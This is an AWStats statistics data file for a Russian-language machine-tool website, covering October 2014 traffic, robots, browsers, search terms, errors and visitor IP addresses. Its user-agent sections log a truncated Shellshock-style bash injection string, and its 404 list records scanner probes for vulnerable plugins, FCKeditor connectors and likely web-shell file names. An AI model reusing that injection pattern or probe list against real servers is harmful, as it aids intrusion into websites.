AWSTATS DATA FILE 7.0 (build 1.971)
# If you remove this file, all statistics for date 201410 will be lost/reset.
# Last config file used to build this data file was /etc/awstats/awstats.stostankov.com.conf.

# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 27
POS_GENERAL 1994                
POS_TIME 2654                
POS_VISITOR 22964               
POS_DAY 40425               
POS_DOMAIN 3573                
POS_LOGIN 3808                
POS_ROBOT 3963                
POS_WORMS 4899                
POS_EMAILSENDER 5030                
POS_EMAILRECEIVER 5173                
POS_SESSION 41310               
POS_SIDER 41521               
POS_FILETYPES 5308                
POS_DOWNLOADS 5573                
POS_OS 6383                
POS_BROWSER 6590                
POS_SCREENSIZE 8242                
POS_UNKNOWNREFERER 8316                
POS_UNKNOWNREFERERBROWSER 9069                
POS_ORIGIN 9301                
POS_SEREFERRALS 9446                
POS_PAGEREFS 9643                
POS_SEARCHWORDS 10435               
POS_KEYWORDS 13268               
POS_MISC 2316                
POS_ERRORS 15454               
POS_CLUSTER 3664                
POS_SIDER_404 15635               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20141101001245 1 0 8482288616195
FirstTime 0
LastTime 20141031213507
LastUpdate 20141101010140 1 0 0 0 0
TotalVisits 483                 
TotalUnique 375                 
MonthHostsKnown 0                   
MonthHostsUnknown 459                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
QuickTimeSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
AddToFavourites 0 413 0
RealPlayerSupport 0 0 0
TotalMisc 0 0 0
DirectorSupport 0 0 0
FlashSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 9 86 1521683 66 110 2822570
1 13 66 1579551 84 119 2844831
2 8 51 681196 85 126 5237757
3 6 6 137071 84 124 5484765
4 25 187 3269577 118 164 6673568
5 5 113 1800609 97 133 6171145
6 21 239 5401293 115 184 6121149
7 56 528 10724990 89 164 2992143
8 87 570 8422260 119 170 3193357
9 117 1015 19556869 135 196 3664931
10 86 1287 25368906 132 218 4170414
11 55 523 18125518 195 249 5079509
12 90 985 19974514 111 338 6844572
13 55 581 9996551 150 280 7638640
14 52 679 11205999 94 147 2890598
15 78 893 18033214 111 186 5695417
16 55 633 17433975 123 168 3953772
17 79 613 13991597 86 139 6271596
18 22 389 15356422 81 142 2539996
19 43 163 2919460 77 117 2449653
20 35 357 10573691 83 129 8399007
21 18 128 2198804 3929 3969 9767704
22 16 189 11992588 6412 6443 6475494
23 1 1 18483 1 2 27542
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 10 first Pages must be first (order not required for others)
BEGIN_DOMAIN 1
ip 1032 10282 220850543
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 10 first Hits must be first (order not required for others)
BEGIN_ROBOT 22
yandex 1365 73457104 20141031202845 79
googlebot 683 16334877 20141031221719 51
bot[\s_+:,\.\;\/\\-] 280 5065241 20141031140515 62
robot 157 5695522 20141031222136 10
wordpress 93 0 20141031221718 0
crawl 81 2008975 20141027111911 1
exabot 68 962933 20141030212131 24
mail\.ru 66 949802 20141017105220 25
java\/[0-9] 30 739946 20141002094750 0
rambler 29 493132 20141003072412 0
commons\-httpclient 1 25 20141018161301 1
no_user_agent 7 137712 20141029140102 0
msnbot 1 28774 20141022122635 0
unknown 10 250 20141031150711 10
slurp 18 403018 20141009002612 0
surveybot 4 55134 20141021133311 2
archive\.org_bot 3 51933 20141017153513 1
favicon 22 694376 20141030202648 0
discovery 7 0 20141024084812 0
mj12bot 19 208889 20141027094106 11
baiduspider 1 27542 20141010100856 0
nutch 1 25 20141005022725 1
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 10
css 932 7675468 0 0
png 690 1156167 0 0
pdf 17 45172926 0 0
txt 1 19929 0 0
php 57 1209456 0 0
html 975 26830677 0 0
jpg 3193 92361373 0 0
js 1588 40601747 0 0
gif 2807 2405032 0 0
xls 22 3417768 0 0
END_FILETYPES

# Downloads - Hits - Bandwidth
BEGIN_DOWNLOADS 10
/robots.txt 278 0 6950
/wp-content/uploads/2013/12/%D0%A1atalogue-Plasmet-2013.pdf 25 6 82499816
/wp-content/uploads/2014/01/%D0%A1%D1%85%D0%B5%D0%BC%D0%B0-%D0%BF%D1%80%D0%BE%D0%B5%D0%B7%D0%B4%D0%B0.pdf 21 0 3255320
/wp-content/uploads/2013/06/Price.xls 19 1 3426336
/wp-content/uploads/2014/01/%D0%A0%D0%B0%D1%81%D1%87%D0%B5%D1%82-%D1%82%D1%80%D0%B5%D0%B1%D1%83%D0%B5%D0%BC%D0%BE%D0%B3%D0%BE-%D1%83%D1%81%D0%B8%D0%BB%D0%B8%D1%8F-%D0%B3%D0%B8%D0%B1%D0%BA%D0%B8.xls 12 2 922760
/sitemap.xml.gz 3 0 4371
/wp-content/uploads/2014/07/GOST__17122-85.pdf 2 0 746460
/license.txt 1 0 19929
/wp-content/uploads/2014/07/GOST-P-53923-2010.pdf 1 0 472093
/wp-content/uploads/2014/01/%d0%a1%d1%85%d0%b5%d0%bc%d0%b0-%d0%bf%d1%80%d0%be%d0%b5%d0%b7%d0%b4%d0%b0.pdf 0 2 325532
END_DOWNLOADS

# OS ID - Hits
BEGIN_OS 14
linuxandroid 100
winlong 20
winxp 3665
winnt 3
linuxubuntu 3
linux 270
winvista 716
win7 5000
bsdfreebsd 1
macosx 357
winunknown 3
win2003 58
linuxdebian 1
Unknown 96
END_OS

# Browser ID - Hits
BEGIN_BROWSER 91
msie6.0 43
firefox28.0 63
firefox10.0 3
firefox26.0 1
chrome5.0.375.99 1
firefox18.0 2
chrome38.0.2125.111 232
curl 1
chrome31.0.1650.63 33
chrome24.0.1312.71 1
msie8.0 821
chrome32.0.1709.113 21
chrome34.0.1847.132 29
msie7.0 19
chrome37.0.2062.120 1
chrome27.0.1453 56
chrome28.0.1500.74 35
firefox9.0.1 1
chrome21.0.1228.0 5
netscape 3
chrome33.0.1750.152 21
chrome34.0.1847.131 32
firefox21.0 30
firefox29.0 51
safari6.0 1
chrome28.0.1500.75 242
firefox3.6.4 21
firefox12.0 53
chrome35.0.1916.114 20
chrome36.0.1985.143 131
firefox33.0 135
mozilla 400
firefox25.0 322
netscape5.0 2
chrome33.0.1750.117 29
chrome38.0.2125.114 20
firefox14.0.1 11
firefox19.0 3
safari 153
firefox15.0.1 31
firefox35.0 30
chrome37.0.2062.124 1453
safari7.0 92
firefox5.0 1
firefox15.0 1
firefox3.0.7 3
firefox4.0.1 7
microsoft\-webdav\-miniredir 3
chrome38.0.2125.104 912
android 48
chrome28.0.1500.95 1
chrome38.0.2125.101 313
chrome36.0.1985.125 370
chrome12.0.742.112 1
firefox24.0 1
firefox3.5.3 30
opera9.80 1419
firefox31.0 117
chrome10.0.648.204 1
msie9.0 177
chrome37.0.2062.122 280
chrome28.0.1500.52 1
chrome37.0.2062.103 78
Unknown 54
firefox27.0 1
firefox11.0 1
chrome37.0.2062.94 63
chrome10.0.648.127 1
safari7.1 83
firefox32.0 1165
firefox17.0 32
chrome32.0.1705.153 34
chrome28.0.1469.0 1
chrome14.0.808.0 1
firefox3.6.16 1
chrome27.0.1453.110 23
msie5.5 1
firefox30.0 31
chrome18.0.1025.168 1
chrome19.0.1063.0 1
firefox1.0.7 1
chrome35.0.1916.153 20
firefox22.0 21
chrome25.0.1364.172 83
msie10.0 178
safari5.1 1
safari4.0.4 48
chrome31.0.1650.16 4
firefox3.6.8 19
chrome14.0.790.0 1
firefox3.5.7 5
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 12
Mozilla 20141003174059
Mozilla/5.0_(compatible;_Google-Site-Verification/1.0) 20141012151150
WebIndex 20141031150905
Mozilla/5.0_(compatible;_YandexBot/3.0;__http://yandex.com/bots) 20141031114808
Mozilla/5.0_(compatible;_Embedly/0.2;_snap;__http://support.embed.ly/) 20141003150700
()_{_:;};_/bin/bash_-c_\ 20141022015944
Opera/9.80_(Android;_Opera_Mini/7.6.35843/35.5125;_U;_ru)_Presto/2.8.119_Version/11.10 20141030120831
WhatWeb/0.4.8-dev 20141014183921
wsr-agent/1.0 20141007110504
NerdyBot 20141031175436
Mozilla/5.1_(compatible;_U5/1.0;__http://uni5download.com) 20141008071348
Mozilla/5.0_(compatible;_Embedly/0.2;__http://support.embed.ly/) 20141003150657
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 5
()_{_:;};_/bin/bash_-c_\ 20141022015944
WhatWeb/0.4.8-dev 20141014183921
WebIndex 20141031150905
wsr-agent/1.0 20141007110504
NerdyBot 20141031175436
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 356 640
From1 1 1
From2 235 300
From3 40 61
From4 400 9291
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 4
google 106 160
search 7 7
rambler 6 6
yandex 116 127
END_SEREFERRALS

# External page referers - Pages - Hits
# The 10 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 17
http://yandex.by/clck/jsredir 10 11
http://yandex.ua/clck/jsredir 6 6
http://uni5download.com 4 4
http://domainsigma.com/whois/stostankov.com 4 4
http://www.s-shot.ru 4 4
http://www.belfirms.com/info/firm1818.html 2 2
http://www.texxinternational.com/soft.php 2 2
http://go.mail.ru/search 2 2
http://mansio.ru 1 1
http://go.mail.ru/search_images 1 7
http://tiu.ru/p33132105-instrument-dlya-listogibov.html 0 11
http://yandex.by/images/search 0 2
http://name911.com/research/stostankov.com 1 1
http://privhosting.com 1 1
http://yandex.by/images/ 0 1
http://forum.stopguessredirects.com 1 1
http://map.by/ru/info/specstankoservis-chtpup.htm 1 1
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 19
rlv 7
%d0%bf%d1%80%d0%be%d0%b4%d0%b0%d0%bc+%d0%b4%d0%b8%d1%81%d0%ba%d0%be%d0%b2%d1%8b%d0%b9+%d0%bd%d0%be%d0%b6+%d0%b4%d0%bb%d1%8f+%d0%bb%d0%b8%d1%81%d1%82%d0%be%d0%b3%d0%b8%d0%b1%d0%b0 3
stostankov.com 3
%d0%b4%d0%b8%d1%81%d0%ba%d0%be%d0%b2%d1%8b%d0%b5+%d0%bd%d0%be%d0%b6%d0%b8+210 2
%d1%82%d0%b0%d0%b1%d0%bb%d0%b8%d1%86%d0%b0+%d1%80%d0%b0%d1%81%d1%87%d0%b5%d1%82%d0%b0+%d1%83%d1%81%d0%b8%d0%bb%d0%b8%d1%8f+%d0%b4%d0%bb%d1%8f+%d0%bb%d0%b8%d1%81%d1%82%d0%be%d0%b3%d0%b8%d0%b1%d0%b0 2
%d0%b7%d0%b0%d0%bf%d1%87%d0%b0%d1%81%d1%82%d0%b8+%d0%ba+%d1%81%d1%82%d0%b0%d0%bd%d0%ba%d1%83+%d0%bc%d0%ba6056 2
%d1%81%d1%82%d0%b0%d0%bd%d0%be%d0%ba%d1%81+%d0%ba%d0%be%d0%bc 2
%d1%80%d0%b5%d0%bc%d0%be%d0%bd%d1%82+%d1%82%d0%be%d0%ba%d0%b0%d1%80%d0%bd%d1%8b%d0%b9+%d1%81%d1%82%d0%b0%d0%bd%d0%be%d0%ba+%d0%b4%d0%b8%d0%bf+300 2
%d0%b3%d0%b8%d0%b1%d0%ba%d0%b0+%d0%bb%d0%b8%d1%81%d1%82%d0%b0+%d0%b2+%d1%82%d1%80%d0%b5%d1%85+%d0%bf%d0%bb%d0%be%d1%81%d0%ba%d0%be%d1%81%d1%82%d1%8f%d1%85 1
%d0%b8%d0%bd%d1%81%d1%82%d1%80%d1%83%d0%bc%d0%b5%d0%bd%d1%82+%d0%b4%d0%bb%d1%8f+%d0%b3%d0%b8%d0%b1%d0%ba%d0%b8+%d0%bb%d0%b8%d1%81%d1%82%d0%be%d0%b2%d0%be%d0%b3%d0%be+%d0%bc%d0%b5%d1%82%d0%b0%d0%bb%d0%bb%d0%b0 1
%d1%82%d0%b5%d0%be%d1%80%d0%b8%d1%8f+%d0%b3%d0%b8%d0%b1%d0%ba%d0%b8+%d0%bb%d0%b8%d1%81%d1%82%d0%be%d0%b2%d0%be%d0%b3%d0%be+%d0%bc%d0%b5%d1%82%d0%b0%d0%bb%d0%bb%d0%b0 1
%d0%b7%d0%b0%d0%bf%d1%87%d0%b0%d1%81%d1%82%d0%b8+%d0%bd%d0%b0+%d1%81%d1%82%d0%b0%d0%bd%d0%be%d0%ba+1%d0%bc630+%d0%b4%d0%b8%d0%bf-300 1
%d1%80%d0%b5%d0%bc%d0%be%d0%bd%d1%82+%d1%88%d0%bb%d0%b8%d1%84%d0%be%d0%b2%d0%b0%d0%bb%d1%8c%d0%bd%d1%8b%d1%85+%d0%ba%d1%80%d1%83%d0%b3%d0%be%d0%b2 1
%d1%80%d1%83%d0%ba%d0%be%d0%b2%d0%be%d0%b4%d1%81%d1%82%d0%b2%d0%be+%d0%bf%d0%be+%d0%bf%d1%80%d0%be%d1%84%d0%b8%d0%bb%d0%b0%d0%ba%d1%82%d0%b8%d1%87%d0%b5%d1%81%d0%ba%d0%be%d0%bc%d1%83+%d0%be%d0%b1%d1%81%d0%bb%d1%83%d0%b6%d0%b8%d0%b2%d0%b0%d0%bd%d0%b8%d1%8e+%d0%b8+%d0%b2%d0%bd%d0%b5%d0%bf%d0%bb%d0%b0%d0%bd%d0%be%d0%b2%d0%be%d0%bc%d1%83+%d1%80%d0%b5%d0%bc%d0%be%d0%bd%d1%82%d1%83+%d1%81%d1%82%d0%b0%d0%bd%d0%ba%d0%b0 1
name%40domain.com 1
%d0%b4%d0%be%d1%80%d0%b0%d0%b1%d0%be%d1%82%d0%ba%d0%b0+%d0%b0%d0%b1%d1%80%d0%b0%d0%b7%d0%b8%d0%b2%d0%bd%d0%be%d0%b3%d0%be+%d0%ba%d1%80%d1%83%d0%b3%d0%b0 1
%d1%81%d0%b3%d0%b8%d0%b1%d0%b0%d0%bd%d0%b8%d0%b5+%d0%bb%d0%b8%d1%81%d1%82%d0%be%d0%b2%d0%be%d0%b3%d0%be+%d0%bc%d0%b5%d1%82%d0%b0%d0%bb%d0%bb%d0%b0 1
%d0%b4%d0%bb%d0%b8%d0%bd%d0%b0+%d0%bc%d0%b0%d1%82%d1%80%d0%b8%d1%86%d1%8b+%d1%81%d1%82%d0%b0%d0%bd%d0%be%d0%ba+4100 1
%d0%bc%d0%b0%d1%88%d0%b8%d0%bd%d0%ba%d0%b0+%d0%b4%d0%bb%d1%8f+%d0%b3%d0%b8%d0%b1%d0%ba%d0%b8+%d0%bb%d0%b8%d1%81%d1%82%d0%be%d0%b2%d0%be%d0%b3%d0%be+%d0%bc%d0%b5%d1%82%d0%b0%d0%bb%d0%bb%d0%b0 1
END_SEARCHWORDS

# Search keywords - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 56
%d0%b4%d0%bb%d1%8f 7
rlv 7
%d0%bb%d0%b8%d1%81%d1%82%d0%be%d0%b3%d0%b8%d0%b1%d0%b0 5
%d1%81%d1%82%d0%b0%d0%bd%d0%be%d0%ba 4
%d0%bc%d0%b5%d1%82%d0%b0%d0%bb%d0%bb%d0%b0 4
%d0%bb%d0%b8%d1%81%d1%82%d0%be%d0%b2%d0%be%d0%b3%d0%be 4
%d0%b7%d0%b0%d0%bf%d1%87%d0%b0%d1%81%d1%82%d0%b8 3
stostankov.com 3
%d1%80%d0%b5%d0%bc%d0%be%d0%bd%d1%82 3
%d0%b3%d0%b8%d0%b1%d0%ba%d0%b8 3
%d1%82%d0%b0%d0%b1%d0%bb%d0%b8%d1%86%d0%b0 2
%d0%b0%d0%b1%d1%80%d0%b0%d0%b7%d0%b8%d0%b2%d0%bd%d0%be%d0%b3%d0%be 1
%d1%80%d0%b5%d0%bc%d0%be%d0%bd%d1%82%d1%83 1
%d0%b4%d0%bb%d0%b8%d0%bd%d0%b0 1
%d1%88%d0%bb%d0%b8%d1%84%d0%be%d0%b2%d0%b0%d0%bb%d1%8c%d0%bd%d1%8b%d1%85 1
%d0%b4%d0%be%d1%80%d0%b0%d0%b1%d0%be%d1%82%d0%ba%d0%b0 1
%d0%bf%d0%bb%d0%be%d1%81%d0%ba%d0%be%d1%81%d1%82%d1%8f%d1%85 1
%d0%b8%d0%bd%d1%81%d1%82%d1%80%d1%83%d0%bc%d0%b5%d0%bd%d1%82 1
%d0%b4%d0%b8%d0%bf-300 1
%d1%82%d1%80%d0%b5%d1%85 1
%d0%b8 1
300 2
%d0%bb%d0%b8%d1%81%d1%82%d0%b0 1
%d1%81%d1%82%d0%b0%d0%bd%d0%ba%d1%83 2
%d0%bd%d0%be%d0%b6%d0%b8 2
%d0%ba 2
%d0%ba%d1%80%d1%83%d0%b3%d0%b0 1
%d0%b2 1
%d0%bf%d0%be 1
%d1%82%d0%be%d0%ba%d0%b0%d1%80%d0%bd%d1%8b%d0%b9 2
%d0%bf%d1%80%d0%be%d1%84%d0%b8%d0%bb%d0%b0%d0%ba%d1%82%d0%b8%d1%87%d0%b5%d1%81%d0%ba%d0%be%d0%bc%d1%83 1
%d0%b2%d0%bd%d0%b5%d0%bf%d0%bb%d0%b0%d0%bd%d0%be%d0%b2%d0%be%d0%bc%d1%83 1
%d0%b4%d0%b8%d0%bf 2
%d0%bd%d0%be%d0%b6 3
%d0%b4%d0%b8%d1%81%d0%ba%d0%be%d0%b2%d1%8b%d0%b9 3
%d0%bf%d1%80%d0%be%d0%b4%d0%b0%d0%bc 3
%d0%b4%d0%b8%d1%81%d0%ba%d0%be%d0%b2%d1%8b%d0%b5 2
%d0%ba%d1%80%d1%83%d0%b3%d0%be%d0%b2 1
%d1%83%d1%81%d0%b8%d0%bb%d0%b8%d1%8f 2
%d0%ba%d0%be%d0%bc 2
%d0%bc%d0%b0%d1%82%d1%80%d0%b8%d1%86%d1%8b 1
%d0%bd%d0%b0 1
%d0%bc%d0%ba6056 2
%d0%bc%d0%b0%d1%88%d0%b8%d0%bd%d0%ba%d0%b0 1
4100 1
%d1%80%d1%83%d0%ba%d0%be%d0%b2%d0%be%d0%b4%d1%81%d1%82%d0%b2%d0%be 1
%d1%81%d0%b3%d0%b8%d0%b1%d0%b0%d0%bd%d0%b8%d0%b5 1
name%40domain.com 1
%d1%81%d1%82%d0%b0%d0%bd%d0%be%d0%ba%d1%81 2
210 2
%d0%be%d0%b1%d1%81%d0%bb%d1%83%d0%b6%d0%b8%d0%b2%d0%b0%d0%bd%d0%b8%d1%8e 1
%d1%82%d0%b5%d0%be%d1%80%d0%b8%d1%8f 1
%d0%b3%d0%b8%d0%b1%d0%ba%d0%b0 1
%d1%81%d1%82%d0%b0%d0%bd%d0%ba%d0%b0 1
1%d0%bc630 1
%d1%80%d0%b0%d1%81%d1%87%d0%b5%d1%82%d0%b0 2
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 8
403 10130 1124430
503 73 23579
206 18 166744
302 15 0
405 6 1501
500 11 3410
301 238 1782
404 167 2319669
END_ERRORS

# URL with 404 errors - Hits - Last URL referer
BEGIN_SIDER_404 115
/ 6 -
/cart/include/version.php 1 -
/buy/include/version.php 1 -
/admin/FCKeditor/editor/filemanager/connectors/test.html 1 -
/cgi-sys/defaultwebpage.cgi 1 -
/admin.php 3 -
/product/tokarnyj-stanok-cs6140-cs6240/ 1 -
/parts/gibochnyj-i-gilotinnyj-instrument/ 2 -
/cgi-sys/FormMail-clone.cgi 1 -
/o-kompanii/nashi-dostizheniya-i-preimushhestva/ 12 http://stostankov.com/
/wp-content/uploads/2013/12/\xc09-600x435.jpg 1 http://stostankov.com/product/puansony-tip-a/
/wp-content/plugins/another-wordpress-classifieds-plugin/AWPCP.po 1 -
/downloader/ 1 -
/catalog/profilegibochnoe-oborudovanie/ 2 -
/styles/actions/users/form.css 1 -
/wp-content/uploads/2013/12/\xc06.jpg 1 http://stostankov.com/product/puansony-tip-a/
/catalog/tokarnoe-oborudovanie/ 1 -
/comments/feed/ 18 -
/zpl.php 1 -
/catalog/sverlilnoe-oborudovanie 1 -
/wp-content/uploads/2014/01/\xd1\xf5\xe5\xec\xe0-\xef\xf0\xee\xe5\xe7\xe4\xe0-600x397.jpg 1 http://stostankov.com/kontakty/
/blog 1 http://stostankov.com/blog
/wp-content/uploads/stylegreen.php 1 http://stostankov.com/wp-content/uploads/stylegreen.php
/editor/editor/filemanager/connectors/test.html 1 -
/catalog/raznoe-oborudovanie/ 1 -
/catalog/strogalnoe-dolbezhnoe-oborudovanie 1 -
/wp-content/uploads/2013/12/\xc015.jpg 1 http://stostankov.com/product/puansony-tip-a/
/wp-content/uploads/2013/12/\xc010-600x405.jpg 1 http://stostankov.com/product/puansony-tip-a/
/forum 2 -
/wp-content/plugins/nmedia-user-file-uploader/readme.txt 1 -
/wp-content/plugins/user-meta/readme.txt 1 -
/wp-content/uploads/styles.php 1 http://stostankov.com/wp-content/uploads/styles.php
/FCKeditor/editor/filemanager/connectors/test.html 1 -
/wp-content/plugins/ckeditor-for-wordpress/ckeditor.config.js 1 -
/product/vertikalno-sverlilnyj-stanok-z5140a-z5150a/ 1 -
/product/vertikalno-sverlilnyj-stanok-z5030-z5035/ 1 -
/wp-content/uploads/2013/12/\xc05-600x494.jpg 1 http://stostankov.com/product/puansony-tip-a/
/include/version.php 8 -
/product/tokarnyj-stanok-cs6150-cs6150b-cs6150c-cs6250-cs6250b-cs6250c/ 1 -
/wp-content/uploads/2013/12/\xed\xee\xe6\xe8-\xe4\xe8\xf1\xea\xee\xe2\xfb\xe5-600x437.jpg 1 http://stostankov.com/product/nozhi-dlya-kpo-rossiya/
/wp-content/uploads/2013/12/\xed\xee\xe6\xe8-\xf8\xe8\xef\xee\xf0\xe5\xe7\xed\xfb\xe51.jpg 1 http://stostankov.com/product/nozhi-dlya-kpo-rossiya/
/wp-content/plugins/gravityforms/css/browsers.css 1 http://stostankov.com/wp-content/plugins/gravityforms/css/browsers.css
/cgi-sys/entropysearch.cgi 1 -
/js/uploadify/uploadify.swf 1 http://stostankov.com/js/uploadify/uploadify.swf
/wp-content/uploads/2013/12/\xc013-600x465.jpg 1 http://stostankov.com/product/puansony-tip-a/
/wp-content/plugins/simple-dropbox-upload-form/ 1 -
/administrator/ 3 -
/catalog/sverlilnoe-oborudovanie/ 1 -
/editor/editor/filemanager/browser/default/connectors/test.html 1 -
/product/tokarnyj-stanok-cs6166b-cs6166c-cs6266b-cs6266c/ 1 -
/uploadify/uploadify.swf 1 http://stostankov.com/uploadify/uploadify.swf
/wp-content/plugins/resume-submissions-job-postings/installer.php 1 -
/wp-content/uploads/oldstyle.php 1 http://stostankov.com/wp-content/uploads/oldstyle.php
/admin/uploadify/uploadify.swf 1 http://stostankov.com/admin/uploadify/uploadify.swf
/wp-content/uploads/2013/12/\xc012-600x561.jpg 1 http://stostankov.com/product/puansony-tip-a/
/product/tokarnyj-stanok-s-chpu-tk36/ 1 -
/wp-content/uploads/nextstyles.php 1 http://stostankov.com/wp-content/uploads/nextstyles.php
/forums 2 -
/catalog/raznoe-oborudovanie 1 -
/wp-content/uploads/2013/12/\xc017.jpg 1 http://stostankov.com/product/puansony-tip-a/
/wp-content/plugins/wp-e-commerce/license.txt 1 -
/wp-content/uploads/shtml.php 1 http://stostankov.com/wp-content/uploads/shtml.php
/misc/drupal.js 1 -
/catalog/listogiby-i-gilotiny/ 1 -
/admin/Fckeditor/editor/filemanager/browser/default/connectors/test.html 1 -
/o-kompanii/nashi-dostizheniya-i-preimushhestva 2 -
/wp-content/plugins/user-photo/admin.css 1 -
/wp-touchn.php 1 http://stostankov.com/wp-touchn.php
/product/vertikalno-sverlilnyj-stanok-z5040-z5050/ 1 -
/catalog/obrabatyvayushhie-centry/ 1 -
/apple-touch-icon.png 1 -
/wp-content/uploads/2013/12/\xed\xee\xe6\xe8-\xe4\xeb\xff-\xe4\xf0\xee\xe1\xe8\xeb\xee\xea1.jpg 1 http://stostankov.com/product/nozhi-dlya-kpo-rossiya/
/wp-content/uploads/2013/12/\xd1atalogue-Plasmet-2013.pdf 1 -
/wp-content/update-script.php 1 http://stostankov.com/wp-content/update-script.php
/wp-content/plugins/user-avatar/readme.txt 1 -
/wp-content/uploads/2013/12/\xc04-600x486.jpg 1 http://stostankov.com/product/puansony-tip-a/
/wp-content/uploads/2013/12/\xc011-600x525.jpg 1 http://stostankov.com/product/puansony-tip-a/
/wp-content/uploads/2013/12/\xc02-600x420.jpg 1 http://stostankov.com/product/puansony-tip-a/
/wp-content/uploads/styleorange.php 1 http://stostankov.com/wp-content/uploads/styleorange.php
/product/tokarno-karuselnyj-obrabatyvayushhij-centr-ktm-912/ 1 -
/store/include/version.php 1 -
/wp-content/uploads/2013/12/\xed\xee\xe6\xe8-\xeb\xf3\xf9\xe8\xeb\xfc\xed\xfb\xe5-600x436.jpg 1 http://stostankov.com/product/nozhi-dlya-kpo-rossiya/
/Fckeditor/editor/filemanager/browser/default/connectors/test.html 1 -
/js/mage/cookies.js 1 http://STOSTANKOV.com
/cgi-bin/php5.cgi 3 -
/wp-content/uploads/2013/12/\xcd\xee\xe6\xe8-\xe3\xe8\xeb\xfc\xee\xf2\xe8\xed\xed\xfb\xe51.jpg 1 http://stostankov.com/product/nozhi-dlya-kpo-rossiya/
/catalog/shlifovalnoe-oborudovanie/ 1 -
/wp-content/uploads/style.php 1 http://stostankov.com/wp-content/uploads/style.php
/wp-content/uploads/2013/12/\xc01-600x516.jpg 1 http://stostankov.com/product/puansony-tip-a/
/order/include/version.php 1 -
/wp-content/force-download.php 1 -
/wp-content/plugins/contact-form-7/license.txt 1 -
/wp-content/plugins/nextgen-gallery/changelog.txt 1 -
/apple-touch-icon-precomposed.png 1 -
/xcart/include/version.php 1 -
/wp-content/uploads/2013/12/\xed\xee\xe6\xe8-\xef\xee-\xe0\xf0\xec\xe0\xf2\xf3\xf0\xe5-600x375.jpg 1 http://stostankov.com/product/nozhi-dlya-kpo-rossiya/
/wp-content/plugins/cimy-user-extra-fields/README_OFFICIAL.txt 1 -
/wp-content/plugins/font-uploader/font-uploader-free.php 1 -
/wp-content/uploads/2013/12/\xc07-600x497.jpg 1 http://stostankov.com/product/puansony-tip-a/
/wp-content/plugins/wp-image-news-slider/functions.php 1 -
/wp-content/uploads/2013/12/\xc08-600x478.jpg 1 http://stostankov.com/product/puansony-tip-a/
/o 1 -
/wp-content/plugins/zingiri-web-shop/admin.css 1 -
/cgi-sys/realsignup.cgi 1 -
/wp-content/plugins/wp-filemanager/incl/libfile.php 1 -
/misc/ui/jquery.effects.blind.min.js 1 -
/wp 1 -
/wp-content/uploads/2013/12/\xc018.jpg 1 http://stostankov.com/product/puansony-tip-a/
/wp-content/plugins/category-grid-view-gallery/cat_grid.php 1 -
/catalog/frezernoe-oborudovanie/ 2 -
/wp-content/uploads/2013/12/\xc014-600x487.jpg 1 http://stostankov.com/product/puansony-tip-a/
/catalog/zuboobrabatyvayushhee-oborudovanie/ 1 -
/market/include/version.php 1 -
/wp-content/uploads/2013/12/\xc03-600x507.jpg 1 http://stostankov.com/product/puansony-tip-a/
/shop/include/version.php 1 -
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 10 first Hits must be first (order not required for others)
BEGIN_VISITOR 459
192.99.149.88 106 106 2566587 20141029014700
178.124.202.175 46 376 19285049 20141017190750
109.232.116.141 32 46 1497919 20141002122734
93.125.3.223 24 50 531352 20141031114846
5.44.169.179 21 21 364862 20141030015044
80.249.83.248 17 116 4729644 20141007151505
109.236.209.82 17 165 3647246 20141007161638
96.126.121.186 14 14 298514 20141007110504
144.76.105.151 14 14 392795 20141019215935
185.6.25.4 13 67 721767 20141014094220
176.116.217.167 1 29 493132 20141025080832
178.64.152.141 0 4 131250 
176.109.87.122 2 25 374632 20141021121532
93.125.111.4 6 165 947986 20141022142904
130.211.122.230 1 1 27542 20141026175445
77.89.225.87 0 3 94897 
46.191.103.217 1 29 493132 20141021191738
94.180.164.166 1 27 276616 20141022183032
131.253.24.89 1 9 201509 20141018050311
146.148.94.18 1 1 27542 20141008174231
37.214.251.208 0 5 83976 
